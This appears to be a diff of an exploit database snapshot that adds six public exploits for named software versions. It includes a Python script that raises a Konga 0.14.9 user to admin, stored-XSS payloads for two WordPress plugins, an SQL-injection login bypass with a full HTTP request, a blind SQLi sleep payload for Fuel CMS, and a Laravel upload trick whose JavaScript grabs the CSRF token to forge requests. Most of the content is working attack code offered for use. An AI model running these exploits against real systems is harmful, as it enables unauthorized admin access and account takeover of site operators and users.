DB: 2021-11-16

6 changes to exploits/shellcodes

WordPress Plugin WPSchoolPress 2.1.16 - 'Multiple' Cross Site Scripting (XSS)
KONGA 0.14.9 - Privilege Escalation
Simple Subscription Website 1.0 - SQLi Authentication Bypass
Fuel CMS 1.4.13 - 'col' Blind SQL Injection (Authenticated)
WordPress Plugin Contact Form to Email 1.3.24 - Stored Cross Site Scripting (XSS) (Authenticated)
PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)

exploits/multiple/webapps/50521.py

@@ -0,0 +1,54 @@
+# Exploit Title: KONGA 0.14.9 - Privilege Escalation
+# Date: 10/11/2021
+# Exploit Author: Fabricio Salomao & Paulo Trindade (@paulotrindadec)
+# Vendor Homepage: https://github.com/pantsel/konga
+# Software Link: https://github.com/pantsel/konga/archive/refs/tags/0.14.9.zip
+# Version: 0.14.9
+# Tested on: Linux - Ubuntu 20.04.3 LTS (focal)
+
+
+
+import requests
+import json
+
+urlkonga = "http://www.example.com:1337/" # change to your konga address
+identifier = "usernormalkonga"            # change user
+password = "changeme"                     # change password
+
+headers = {
+	"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
+	"Content-Type": "application/json;charset=utf-8",
+	"connection-id": "",
+	"Origin": urlkonga,
+	"Referer": urlkonga
+}
+
+url = urlkonga+"login"
+
+data = {
+	"identifier":identifier,
+	"password":password
+}
+
+response = requests.post(url, json=data)
+json_object = json.loads(response.text)
+print("[+] Attack")
+print("[+] Token " + json_object["token"])
+
+url2 = urlkonga+"api/user/"+str(json_object["user"]["id"])
+id = json_object["user"]["id"]
+print("[+] Exploiting User ID "+str(json_object["user"]["id"]))
+
+data2 = {
+  "admin": "true",
+  "passports": {
+    "password": password,
+    "protocol": "local"
+  },
+  "password_confirmation": password,
+  "token":json_object["token"]
+}
+
+print("[+] Change Normal User to Admin")
+response2 = requests.put(url2, headers=headers, json=data2)
+print("[+] Success")

exploits/php/webapps/50520.txt

@@ -0,0 +1,31 @@
+# Exploit Title: WordPress Plugin WPSchoolPress 2.1.16 - 'Multiple' Cross Site Scripting (XSS)
+# Date: 20/08/2021
+# Exploit Author: Davide Taraschi
+# Vendor Homepage: https://wpschoolpress.com/
+# Software Link: https://wpschoolpress.com/free-download/
+# Version: up to 2.1.17 (non included)
+# Tested on: Ubuntu 20.04 over WordPress 5.8 and apache2
+# CVE : CVE-2021-24664
+
+# Description:
+The plugin sanitise some fields using a wordpress built-in function called sanitize_text_field() but does not correctly escape them before outputting in attributes, resulting in Stored Cross-Site Scripting issues.
+The function wp_sanitize_text_field() escape < and > but does not escape characters like ", allowing an attacker to break a HTML input tag and inject arbitrary javascript.
+
+# PoC:
+As admin,
+- Add a new teacher attendance (/wp-admin/admin.php?page=sch-teacherattendance), Tick the Absent box and put the following payload in the Reason: "style=animation-name:rotation onanimationstart=alert(/XSS/)//
+The XSS will be triggered when adding another teacher attendance by clicking on the Add button
+
+- Add a new Student Attendance (/wp-admin/admin.php?page=sch-attendance), tick the Absent box and put the following payload in the Reason: " style=animation-name:rotation onanimationstart=alert(/XSS/)//
+The XSS will be triggered when adding another attendance by clicking the 'Add/Update' button
+
+- Add a new Subject Mark Field (/wp-admin/admin.php?page=sch-settings&sc=subField) and put the following payload in the 'Field': " autofocus onfocus=alert(/XSS/)//
+The XSS will be triggered when editing the created Subject Mark (ie /admin.php?page=sch-settings&sc=subField&ac=edit&sid=3)
+
+- Create a new Subject (/wp-admin/admin.php?page=sch-subject), with the following payload in the Subject Name field: " autofocus onfocus=alert(/XSS/)//
+The XSS will be triggered when editing the Subject
+
+- Create a new Exam (/wp-admin/admin.php?page=sch-exams) with the following payload in the Exam Name Field: " autofocus onfocus=alert(/XSS/)//
+The XSS will be triggered when editing the Exam=20
+
+Note that some of this XSS issues can be executed by a teacher (medium-privileged user), but since wordpress uses HTTPonly cookies is impossible to steal cookies.

exploits/php/webapps/50522.txt

@@ -0,0 +1,28 @@
+# Exploit Title: Simple Subscription Website 1.0 - SQLi Authentication Bypass
+# Exploit Author: Daniel Haro (Dirox)
+# Vendor Homepage: https://www.sourcecodester.com/php/15013/simple-subscription-website-admin-panel-php-and-sqlite-source-code.html
+# Software Link: https://www.sourcecodester.com/php/15013/simple-subscription-website-admin-panel-php-and-sqlite-source-code.html
+# Version: Simple Subscription Website 1.0
+# Tested on: Windows, xampp
+# CVE: CVE-2021-43140
+
+- Description:
+SQL Injection vulnerability exists in Sourcecodester. Simple Subscription Website 1.0. An account takeover exists with the payload: admin' or 1=1-- -
+
+PoC:
+
+POST /plan_application/Actions.php?a=login HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 57
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/plan_application/admin/login.php
+Cookie: PHPSESSID=lcikn75hk4lk03t5onj0022mj3
+
+username=admin'+or+1%3D1--+-&password=admin'+or+1%3D1--+-

exploits/php/webapps/50523.txt

@@ -0,0 +1,23 @@
+# Exploit Title: Fuel CMS 1.4.13 - 'col' Blind SQL Injection (Authenticated)
+# Date: 2021-04-11
+# Exploit Author: Rahad Chowdhury
+# Vendor Homepage: https://www.getfuelcms.com/
+# Software Link: https://github.com/daylightstudio/FUEL-CMS/archive/1.4.13.zip
+# Version: 1.4.13
+# Tested on: Kali Linux, PHP 7.4.16, Apache 2.4.46
+
+Steps to Reproduce:
+1. At first login your panel
+2. then go to "Activity Log" menu
+3. then select any type option
+4. their "col" parameter is vulnerable. Let's try to inject Blind SQL Injection using this query "and (select * from(select(sleep(1)))a)" in "col=" parameter.
+
+POC:
+http://127.0.0.1/fuel/logs/items?type=debug&search_term=&limit=50&view_type=list&offset=0&order=desc&col=entry_date
+and (select * from(select(sleep(1)))a)&fuel_inline=0
+
+Output:
+By issuing sleep(0) response will be delayed to 0 seconds.
+By issuing sleep(1) response will be delayed to 1 seconds.
+By issuing sleep(5) response will be delayed to 5 seconds.
+By issuing sleep(10) response will be delayed to 10 seconds

exploits/php/webapps/50524.txt

@@ -0,0 +1,16 @@
+# Exploit Title: WordPress Plugin Contact Form to Email 1.3.24 - Stored Cross Site Scripting (XSS) (Authenticated)
+# Date: 11/11/2021
+# Exploit Author: Mohammed Aadhil Ashfaq
+# Vendor Homepage: https://form2email.dwbooster.com/
+# Version: 1.3.24
+# Tested on: wordpress
+
+POC
+1. Click Contact form to Email
+http://192.168.111.129/wp-admin/admin.php?page=cp_contactformtoemail
+2. Create new form name with <script>alert(1)</script>
+3. Click Publish
+4. XSS has been triggered
+http://192.168.111.129/wp-admin/admin.php?page=cp_contactformtoemail&pwizard=1&cal=4&r=0.8630795030649687
+5. Open a different browser, logged in with wordpress. Copy the URL and
+Press enter. XSS will trigger.

exploits/php/webapps/50525.txt

@@ -0,0 +1,69 @@
+# Exploit Title: PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)
+# Date: 14/11/2021
+# Exploit Author: Hosein Vita
+# Vendor Homepage: https://laravel.com/
+# Software Link: https://laravel.com/docs/4.2
+# Version: Laravel Framework 8.70.1
+# Tested on: Windows/Linux
+
+# Description: We can bypass laravel image file upload functionality to upload arbitary files on the web server
+# which let us run arbitary javascript and bypass the csrf token , For more information read this one https://hosein-vita.medium.com/laravel-8-x-image-upload-bypass-zero-day-852bd806019b
+
+# Steps to reproduce:
+1- Use HxD tool and add FF D8 FF E0 at the very begining of your file
+2- Use code below to bypass csrf token
+
+ÿØÿà<html>
+<head>
+<title>Laravel Csrf Bypass</title>
+</head>
+<body>
+<script>
+function submitFormWithTokenJS(token) {
+    var xhr = new XMLHttpRequest();
+    xhr.open("POST", POST_URL, true);
+
+    // Send the proper header information along with the request
+    xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
+
+    // This is for debugging and can be removed
+    xhr.onreadystatechange = function() {
+        if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
+            console.log(xhr.responseText);
+        }
+    }
+	//
+    xhr.send("_token=" + token + "&desiredParameter=desiredValue");
+}
+
+function getTokenJS() {
+    var xhr = new XMLHttpRequest();
+    // This tels it to return it as a HTML document
+    xhr.responseType = "document";
+    // true on the end of here makes the call asynchronous
+	//Edit the path as you want
+    xhr.open("GET", "/image-upload", true);
+    xhr.onload = function (e) {
+        if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
+            // Get the document from the response
+            page = xhr.response
+            // Get the input element
+            input = page.getElementsByTagName("input")[0];
+            // Show the token
+            alert("The token is: " + input.value);
+            // Use the token to submit the form
+            submitFormWithTokenJS(input.value);
+        }
+    };
+    // Make the request
+    xhr.send(null);
+}
+getTokenJS();
+
+var POST_URL="/"
+getTokenJS();
+
+</script>
+</html>
+
+3- Save it as Html file and upload it.

files_exploits.csv

@@ -44616,3 +44616,9 @@ id,file,description,date,author,type,platform,port
 50514,exploits/php/webapps/50514.txt,"WordPress Plugin WP Symposium Pro 2021.10 - 'wps_admin_forum_add_name' Stored Cross-Site Scripting (XSS)",1970-01-01,"Murat DEMİRCİ",webapps,php,
 50515,exploits/php/webapps/50515.txt,"WordPress Plugin AccessPress Social Icons 1.8.2 - 'icon title' Stored Cross-Site Scripting (XSS)",1970-01-01,"Murat DEMİRCİ",webapps,php,
 50518,exploits/multiple/webapps/50518.txt,"Mumara Classic 2.93 - 'license' SQL Injection (Unauthenticated)",1970-01-01,"Shain Lakin",webapps,multiple,
+50520,exploits/php/webapps/50520.txt,"WordPress Plugin WPSchoolPress 2.1.16 - 'Multiple' Cross Site Scripting (XSS)",1970-01-01,"Davide Taraschi",webapps,php,
+50521,exploits/multiple/webapps/50521.py,"KONGA 0.14.9 - Privilege Escalation",1970-01-01,"Fabricio Salomao",webapps,multiple,
+50522,exploits/php/webapps/50522.txt,"Simple Subscription Website 1.0 - SQLi Authentication Bypass",1970-01-01,"Daniel Haro",webapps,php,
+50523,exploits/php/webapps/50523.txt,"Fuel CMS 1.4.13 - 'col' Blind SQL Injection (Authenticated)",1970-01-01,"Rahad Chowdhury",webapps,php,
+50524,exploits/php/webapps/50524.txt,"WordPress Plugin Contact Form to Email 1.3.24 - Stored Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Mohammed Aadhil Ashfaq",webapps,php,
+50525,exploits/php/webapps/50525.txt,"PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)",1970-01-01,"Hosein Vita",webapps,php,